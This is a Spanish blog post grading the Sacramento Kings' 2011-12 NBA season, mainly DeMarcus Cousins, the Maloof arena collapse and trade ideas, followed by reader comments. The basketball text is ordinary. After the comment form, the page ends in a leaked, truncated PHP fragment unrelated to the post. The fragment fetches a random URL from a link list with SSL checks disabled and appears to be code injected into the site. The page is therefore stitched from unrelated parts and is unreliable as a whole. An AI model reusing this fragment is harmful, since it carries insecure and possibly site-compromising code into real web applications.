Sacramento Kings: Muy deficiente

30 de June de 2012 por Sancho88
Año de altibajos emocionales para una franquicia que bandea entre la desaparición y la mudanza. Todo ha sido exagerado este año en Sacramento. La puesta en escena en el primer partido de temporada parecía presagiar algo nuevo. Lakers sucumbió y el equipo parecía extra motivado pero el espejismo solo duró algunos días. DeMarcus Cousins, la estrella consolidada del equipo, hizo saltar todas las alarmas al pedir su traspaso. Lanzó su ultimátum tan solo una semana después del comienzo de la temporada: o se iba Paul Westphal o se iba él. Al final, los Maloof le pusieron la carta con el finiquito al míster californiano, al que solo le dio tiempo a dirigir 7 partidos. Sabia decisión, porque entre mantener a un entrenador perdedor o a un pívot ganador, realmente no había color. En su lugar apareció el interino Keith Smart, asistente de Westphal, y, paradojas de la vida, principal aliado de Cousins desde su llegada. Con él en el banquillo, Cousins ha promediado números de All-Star al superar los 18 puntos por partido, 11 rebotes y más de 1 tapón en apenas 30 minutos de juego. Esa es su espada de Damocles, la gran arista por pulir en este jugador, y es que si vamos al análisis de los hechos, que jueguen más minutos Evans o Thornton que el propio Cousins no se debe a temas de calidad o de rol en el equipo, obviamente, sino a los problemas de faltas que no logra solucionar el pívot ‘sophomore’ de los Kings.

El análisis previo de temporada no estuvo muy lejos de lo que ofreció el equipo. Lo previsible se cumplió y sobre la pista apenas superaron las 20 victorias (22-44). Un registro paupérrimo pero tampoco se les puede pedir más teniendo en cuenta la nula apuesta de los propietarios por reunir algunos contratos de dos cifras sobre la pista. El equipo peca de juventud y esa losa pesa mucho. Además, era muy descabellado pensar que la dosis de veteranía, es decir, Chuck Hayes, John Salmons y Francisco García, armaría una defensa de ‘Playoffs’. Sí ofrecieron actitud defensiva y experiencia, pero en ningún caso le dieron al equipo la combinación necesaria de liderazgo y anotación.

Marcus Thornton, que había llegado al equipo en el último tramo de la pasada temporada, demostró todo lo que apuntaba en los Hornets. Definitivamente, tiene una metralleta en la mano y está dispuesto a usarla. Lo malo es que solo utiliza su metralleta. La cabeza, sin embargo, brilla por su ausencia. El máximo anotador de la temporada en los Kings representa los ‘pros’ y los ‘contras’ de este equipo. Es su paradigma: no tiene dificultad ninguna para anotar, pero en el aspecto defensivo o de juego en equipo deja mucho que desear. Ejemplo vivo de lo que sucede en la cancha con Sacramento.

Si vamos al detalle, lo positivo es que el porcentaje de victorias del equipo sube poco a poco y año tras año, lo cual no es muy difícil, pero si entramos a estudiar mínimamente estos datos, los Kings no encadenaron más de 3 victorias consecutivas en todo el año y fueron el equipo más ‘goleado’ de la NBA con 105 puntos en contra cada noche. Ahí queda resumida la actuación defensiva del equipo. En muchos partidos solo les faltaba poner una alfombra roja en la zona para que desfilaran los rivales en su camino hacia la canasta. Smart tiene trabajo y del duro con estos chicos.

La evolución, no obstante, refleja que en uno o dos años el equipo debería dar un salto definitivo hacia los ‘Playoffs’. Llevan 6 años sin llegar a postemporada, pero este año al menos han superado el 30% de victorias. El futuro depende del esfuerzo del club por reforzar puestos claves como el de alero o ala-pívot para no cabrear más a Cousins. No creo que el pívot aguante un año más esta situación. Si los Kings siguen siendo el hazmerreir del Oeste, DeMarcus desertará. Es una sencilla ecuación de primer grado. X=renovación de Cousins + actuación digna; -X, es decir, pasamos a Cousins a la izquierda con su no renovación = ponemos en la derecha otro año charanguero. Él lleva genes de All-Star y de aspirante al anillo y no debería perder el tiempo en una franquicia perdedora. En realidad, sería muy bizarro cortarles las alas a Cousins, Tyreke y demás. De hecho, es muy bizarra ya la situación que viven en el club. Un proyecto que debería armarse en torno a ellos, que son potencialmente jugadores All-Star, racanea con dureza en los contratos porque sus dueños viven una situación económicamente insostenible, pero a la vez no quieren ceder su ‘joya de la corona’ a manos de gente con más dinero y mayor compromiso. En fin, otro año para olvidar en Sacramento. Mediocridad en las pistas y mediocridad al cuadrado en los despachos.

Lo mejor: DeMarcus Cousins en números de MVP, con la cabeza mucho mejor puesta y mejorando a pasos agigantados uno de los aspectos más complicados en la carrera de un jugador de baloncesto: el temido IQ. Su evolución en ese aspecto ha sido clara y ahora guía y lidera por encima de sus propios números. El problema es saber por cuánto tiempo. Además, la gran sorpresa en forma de ‘pick’ 60 del draft del año pasado, Isaiah Thomas, se ‘comió por una pata’ el ‘hype’ de Jimmer Fredette e incluso de Tyler Honeycutt (inclasificable e incalificable). El base de Washington llegó siendo una especie de Nate Robinson y acabó pareciéndose al mejor Mike Bibby. Los Kings por fin tienen director. Por último, positiva fue también la temporada para Tyreke Evans porque olvidó definitivamente su lesión crónica de fascitis plantar y pudo jugar casi todos los partidos. Ya no es el rookie del 20-5-5 pero en realidad no está tan lejos. Sigue siendo un desastre con el tiro de media y larga distancia (20-25% de efectividad), lo que le ha relegado a un segundo puesto de importancia en el equipo tras Cousins, pero es difícil imaginar un jugador que cobre lo que cobra Tyreke y aporte tanto. Este año ha demostrado que puede defender a aleros muy grandes, a bases pequeños y a escoltas indistintamente, y en ataque, aunque está teniendo problemas para cambiar el rol desde point guard a ser alero, está haciendo grandes esfuerzos.

Lo peor: Desde luego, en el apartado calamidades, el mayor bochorno de la temporada se vivió a principios de abril, y es que el gran acuerdo al que habían llegado los hermanos Maloof con la ciudad de Sacramento para construir un nuevo pabellón se rompió de la noche a la mañana. Los esfuerzos del alcalde Kevin Johnson no sirvieron para nada y el proyecto del Sacramento Arena se destruyó sobre sus propios cimientos mucho antes de empezar. La razón fue un pequeño aval de 5 millones de dólares que los Maloof se negaron a pagar. Teniendo en cuenta que el pabellón estaba presupuestado en más de 300 millones, se puede intuir el descaro con el que los ‘hermanísimos’ trataron de dar carpetazo al asunto. Ahora la salida parece cada día más clara hacia Anaheim, y así lo ha confirmado el propio Stern. Sacramento muy probablemente se quedará sin sus Kings a partir de 2013. Ya no hay milagros que valgan. Seattle y Kansas City parten en segunda fila tras Anaheim para el traslado del equipo.

Jugando a GM:

-Sabiendo las limitaciones económicas de estos señores, poco se puede hacer en realidad. La elección de ‘draft’ ha caído del cielo en forma de bendición. Thomas Robinson parece el complemento ideal para arropar a Cousins en la zona y protegerlo en la defensa. No obstante, también decíamos lo mismo sobre Hickson el año pasado y JJ pasó sin pena ni gloria por la capital californiana. Pero como no se puede hacer de la excepción la regla más absoluta, a priori Robinson-Cousins debe ser una pareja de muchos quilates que está llamada a rendir desde el primer día. Además de ellos, Jason Thompson se ha ganado tener un puesto en la plantilla. De momento, el equipo ya le ha ofrecido la ‘qualifying offer’. Ahora habrá que esperar a ver las oferta que recibe. Yo lo renovaría sin dudarlo.

-El otro debate abierto está entre Thornton y Evans. ¿Con quién se deben quedar los Kings y a quién deben traspasar? No han demostrado buena química entre los dos y lo más natural sería desprenderse de uno de ellos. Teniendo en cuenta lo que ofrece cada uno y lo que le hace falta al equipo, además de los salarios, lo lógico sería ofrecer a Thornton como un caramelo más que apetecible para equipos con problemas en la anotación e intentar obtener un alero defensivo a cambio. Es decir, yo me quedaría a Evans. Si yo fuera Petrie, Batum y Deng ya tendrían mis ofertas sobre la mesa. Pero como seguramente no quieran venirse a un equipo como los Kings y opten a algo más como agentes libres, la jugada sería esa, intercambiar a Thornton por un alero. DeRozan podría encajar bien en los Kings y Battier es otro nombre que no perdería de vista. De todas maneras, no podemos olvidar a Terrence Williams. El ex de Nets y Rockets llegó tras el All Star y ha jugado muy bien, resultando una agradable sorpresa para todos. Esperemos que su cabeza le permita asentarse por fin.

-En ese posible intercambio buscando el alero que ahora necesita el equipo, se podría añadir a Salmons, Hayes o García, jugadores con contratos de nivel medio pero que no rinden lo esperado y tienen firmado hasta 2014 como mínimo. Lo mismo pasa con Outlaw. No está el equipo en la mejor situación como para ‘amnistiar’ a ninguno de ellos, pero sería conveniente utilizarlos junto a Thornton para obtener algo a cambio.

Comenta

8 comentarios a esta entrada

  1. Esteban dice:
    #1

    muy bueno sancho, muy detallado, lo que lo hace algo largo, pero esta bien, mejor tener todos los datos, comparto la mayoria del analisis

    para jugar al GM con sacramente hay que estar loco, ya fue realmente extraño el movimiento que realizaron el año pasado trayendo a salmons para elegir en el draft a, FREDETTE!, se han comido el contratazo de salmos (7 puntos por partido) y otro contratazo rookie de fredette, mas garcia y los contratos rookies altos de evans y cousins y los 8 millones para thornton, no hay espacio para nada, solo robinson y poco mas

    aguantar a garcia un año mas y aplicar la amnistia a salmons seria la prioridad, aunque ya el año quie viene deben afrontar la renovacion de evans si hacen la oferta (sde rumoreo q no) y al sigueinte la que cousins, asi que estan bastante atados

    deberian tener un entrenador que pudiera ubicar a envas en la posicion de alero, tratando de juntarlo con thomas y thorton, para poner lo mejor que tienen en cancha o sacarlo de un sexto hombre polifuncional, sino su era ha acabado, no tiene vision para ser un gran base, ni tiro para jugar de escolta, sin dudas es un jugador q deberia sentirse mejor de alero

    sino buscar un trade que traigan algun veterano que pueda ayudar al desarrollo de estos jovenes en la posicion del 3, los pacers necesitan un escolta y le sobra un alero, evans o thornton por granger tendria sentido para ambas partes, granger no es un jugador franquicia ni un gran lider, pero es un hombre util con un contrato aceptable que puede producir, y el escolta que se quede mas cousins seran los HOMBRES del equipo, con un papel asi de secundario granger podria ser realmente muy util

      Citar

  2. Sancho88 dice:
    #2

    Ese Thornton por Granger me convence al 100% Esteban. Sería un golpe de mano. Además supongo que habrá gente interesada en Thornton, y precisamente los Pacers adolecen de un escolta anotador y Granger empezó siendo el referente hace dos-tres años, pero ahora puede no encajar en el proyecto liderado por Hibbert y Paul George… a los Kings les vendría bien el traspaso, porque perder a Thornton no debería suponer un gran quebradero de cabeza, como bien dices están Salmons y Fredette (hay que esperar una evolución seria de este último) y Granger te puede aportar todos los puntos que necesites y además no es tan abusón y egoísta como Thornton. Podría dejar jugar a Evans y Thomas para recibir a la esquina o en un lateral como a él le gusta. Si Fredette demuestra lo que prometía, la idea de jugar con Thomas-Fredette y el hipotético Granger como titulares sería muy buena, con Evans y Thompson comandando la segunda unidad, junto a Salmons que no defiende mal, Greene que tiene sus buenas rachas, etc. Realmente, poco más habría que tocar. Por dentro Hayes hace lo que puede, Whiteside ha demostrado en lo poco que ha jugado que puede aportar grandes cosas desde el banco, sobre todo intimidación atrás y tapones, y del resto… poca cosa, mucho alerismo pero grades decepciones Outlaw y Honeycutt. Thornton+García o +Salmons por un alero sería lo que yo ofrecería

      Citar

  3. Melo15 dice:
    #3

    Poner a Fredette de escolta es sinonimo de desastre defensivo, si no puede defender a bases como va a defender a escoltas que son mas grandes, fuertes y seguramenete mas rapidos.
    Creo que Fredette deberia emepezar dando descanso a Thomas.
    Que os parece un Thorthon por Wesley Mathews, el de Portland me parece un jugon: Defiende, anota y podria dar descanso a Evans y a Terrence.

      Citar

  4. Esteban dice:
    #4

    Melo15:
    Poner a Fredette de escolta es sinonimo de desastre defensivo, si no puede defender a bases como va a defender a escoltas que son mas grandes, fuertes y seguramenete mas rapidos.
    Creo que Fredette deberia emepezar dando descanso a Thomas.
    Que os parece un Thorthon por Wesley Mathews, el de Portland me parece un jugon: Defiende, anota y podria dar descanso a Evans y a Terrence.

    me parece que lke vendria bien a ambos, portland carce de anotadores perimetrales y sacramento carece de pootencias fisicas y defensivas como mathews, pero dudo que convenzan a portland de esto

    tios capaces de tirar y meter no son tan dificiles de encontrar, si es dificil que sean baratos, y thorton con 8 al año por 3 años mas, no es justamente barato, escoltas malos defensores, tiradores y mal pagos abundan en la NBA, sin ir mas lejos el propios salmons estaria en esa categoria, ben gordon, stuckey, algo asi le depara el futuro a marshon brooks

    pero a diferencia de lo anterior, perimetrales tan fisicos como mathews, gran defensor, capaz de anotar sus tiros abiertos y cumplir en ofensiva, con contrato de 6 millones, son pocos, no es facil encontrarlos como para dejarlo ir

    te repito melo, creo que seria un trade que cubriria necesidades actuales de ambos y quiza saldrian ganando, pero portland esta en 32 millones, puede cubrir su falta de anotadores sin necesidad de desprenderse de mathews

      Citar

  5. melo15 dice:
    #5

    Cual es el minimo salaria I el maximo o tope salarial??

      Citar

  6. MagicJohnson32 dice:
    #6

    Tremendo análisis, Sancho, por calidad y por cantidad, jeje.

    Yo tengo cada vez más la sensación de que Tyreke condiciona demasiado el juego. No quiere jugar de 3, no tiene tiro para jugar de 2 y absorbe mucha bola cuando juega de 1. Yo buscaría el traspaso por un alero.

      Citar

  7. Txusma dice:
    #7

    Los Kings podrían ofrecer 10 kilos por Nicolas Batum. En principio los Blazers q igualarán cualquier oferta que llegue pero 10 kilos son muchos kilos. Particularmente, a mi el francés me gusta bastante.

      Citar

  8. MagicJohnson32 dice:
    #8

    Por ejemplo. Batum tiene 23 años y del tipo de jugador por el que una franquicia como los Kings debería apostar. Dudo mucho que los Blazers lo dejen ir pero nunca se sabe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>